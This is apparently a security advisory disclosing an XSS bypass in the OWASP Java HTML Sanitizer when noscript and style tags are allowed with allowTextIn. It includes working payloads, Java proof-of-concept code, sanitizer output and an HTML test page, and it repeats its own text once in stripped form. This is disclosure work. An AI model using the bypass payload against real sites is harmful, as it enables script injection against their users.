Summary
It is observed that OWASP java html sanitizer is vulnerable to XSS if HtmlPolicyBuilder allows noscript and style tags with allowTextIn inside the style tag. This could lead to XSS if the payload is crafted in such a way that it does not sanitise the CSS and allows tags which is not mentioned in HTML policy.
Details
The OWASP java HTML sanitizer is vulnerable to XSS. This only happens when HtmlPolicyBuilder allows noscript & style tag with allowTextIn inside style tags.
The following condition is very edge case but if users combine a HtmlPolicyBuilder with any other tags except noscript and allow style tag with allowTextIn inside the style tag then In this case sanitizer would be safe from XSS. This happens because how the browser also perceives noscript tags post sanitization.
PoC
- Lets create a
HtmlPolicyBuilder which allows p, noscript, style html tags and allows .allowTextIn("style").
- There are two XSS payloads which very identical and only difference is one has p tag and other has noscript tag.
These payload have script tags that could be vulnerable to XSS and should be stripped out after sanitisation.
1. <noscript><style></noscript><script>alert(1)</script>
2. <p><style></p><script>alert(1)</script>
- Run the following piece of code which sanitizes the payload.
public class main {
private static final String ALLOWED_HTML_TAGS = "p, noscript, style";
/**
* Description of vulnerability :
* The OWASP Sanitizer sanitize the user inputs w.r.t to defined whitelisted HTML tags.
* However, if script tags is not allowed in the HTML element policy yet it can lead to XSS in edge cases.
*/
public static void main(String[] args) {
withAllowedTextAndStyleTag();
}
/**
* Test case : Vulnerable to XSS
*/
public static void withAllowedTextAndStyleTag() {
HtmlPolicyBuilder htmlPolicyBuilder = new HtmlPolicyBuilder();
PolicyFactory policy = htmlPolicyBuilder
.allowElements(ALLOWED_HTML_TAGS.split("\\s*,\\s*"))
.allowTextIn("style")
.toFactory();
String untrustedHTMLOne = "<noscript><style></noscript><script>alert(1)</script>";
String untrustedHTMLTwo = "<p><style></p><script>alert(1)</script>";
System.out.println("PAYLOAD: " + untrustedHTMLOne +"\nSANITIZED OUTPUT: " + policy.sanitize(untrustedHTMLOne));
System.out.println("PAYLOAD: " + untrustedHTMLTwo +"\nSANITIZED OUTPUT: " + policy.sanitize(untrustedHTMLTwo));
}
}
Use the latest library version
<dependency>
<groupId>com.googlecode.owasp-java-html-sanitizer</groupId>
<artifactId>owasp-java-html-sanitizer</artifactId>
<version>20240325.1</version>
</dependency>
- Output of the POC code should look like this
PAYLOAD: <noscript><style></noscript><script>alert(1)</script>
SANITIZED OUTPUT: <noscript><style></noscript><script>alert(1)</script></style></noscript>
PAYLOAD: <p><style></p><script>alert(1)</script>
SANITIZED OUTPUT: <p><style></p><script>alert(1)</script></style></p>
- Lets understand what happened in sanitization process below
--------------------------| --> anything after style tag is cosidered as CSS and not sanitized
PAYLOAD: <noscript><style> {</noscript><script>alert(1)</script>} -> CSS
-----------------------------------| --> after sanitization, payload in script tag remained same and style and noscript tags is closed.
SANITIZED OUTPUT: <noscript><style>{</noscript><script>alert(1)</script>}</style></noscript>
-------------------| --> anything after style tag is cosidered as CSS and not sanitized
PAYLOAD: <p><style></p>{<script>alert(1)</script>} -> CSS
--------------------------- | --> after sanitization payload in script tag remained same and style and p tags is closed.
SANITIZED OUTPUT: <p><style>{</p><script>alert(1)</script>}</style></p>
- Lets create a sample html page and copy both sanitized output which should be generated in step 5
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>POC OF SANITIZER OUTPUT</title>
</head>
<body>
<!--XSS OUTPUT : <noscript><style></noscript><script>alert(1)</script></style></noscript>-->
<noscript><style></noscript><script>alert(1)</script></style></noscript>
<!-- SAFE OUTPUT -->
<p><style></p><script>alert(1)</script></style></p>
</body>
</html>
- Open this HTML page in the browser it should pop an alert.

- Open inspect element to understand what happened. If users look closely a payload combined with p tag and style tag did not cause XSS and browser percived anything after style tag as CSS.

- The payload which combined with noscript tag and style tag did caused XSS.
The broswer perceived noscript and which wrapped style tag then closed noscript tag and after that script payload is considered as valid HTML tag and it executed in browser and this leads to XSS because this is very different then what happened in the last example with p tag.

Impact
- This potentially could leads to XSS in applications.
Ref : https://owasp.org/www-community/attacks/xss/
References
Summary
It is observed that OWASP java html sanitizer is vulnerable to XSS if HtmlPolicyBuilder allows
noscriptandstyletags withallowTextIninside the style tag. This could lead to XSS if the payload is crafted in such a way that it does not sanitise the CSS and allows tags which is not mentioned in HTML policy.Details
The OWASP java HTML sanitizer is vulnerable to XSS. This only happens when HtmlPolicyBuilder allows
noscript&styletag withallowTextIninside style tags.The following condition is very edge case but if users combine a HtmlPolicyBuilder with any other tags except
noscriptand allowstyletag withallowTextIninside the style tag then In this case sanitizer would be safe from XSS. This happens because how the browser also perceivesnoscripttags post sanitization.PoC
HtmlPolicyBuilderwhich allowsp, noscript, stylehtml tags and allows.allowTextIn("style").These payload have script tags that could be vulnerable to XSS and should be stripped out after sanitisation.
Use the latest library version
--------------------------| --> anything after style tag is cosidered as CSS and not sanitized PAYLOAD: <noscript><style> {</noscript><script>alert(1)</script>} -> CSS -----------------------------------| --> after sanitization, payload in script tag remained same and style and noscript tags is closed. SANITIZED OUTPUT: <noscript><style>{</noscript><script>alert(1)</script>}</style></noscript> -------------------| --> anything after style tag is cosidered as CSS and not sanitized PAYLOAD: <p><style></p>{<script>alert(1)</script>} -> CSS --------------------------- | --> after sanitization payload in script tag remained same and style and p tags is closed. SANITIZED OUTPUT: <p><style>{</p><script>alert(1)</script>}</style></p>The broswer perceived noscript and which wrapped
styletag then closed noscript tag and after that script payload is considered as valid HTML tag and it executed in browser and this leads to XSS because this is very different then what happened in the last example with p tag.Impact
Ref : https://owasp.org/www-community/attacks/xss/
References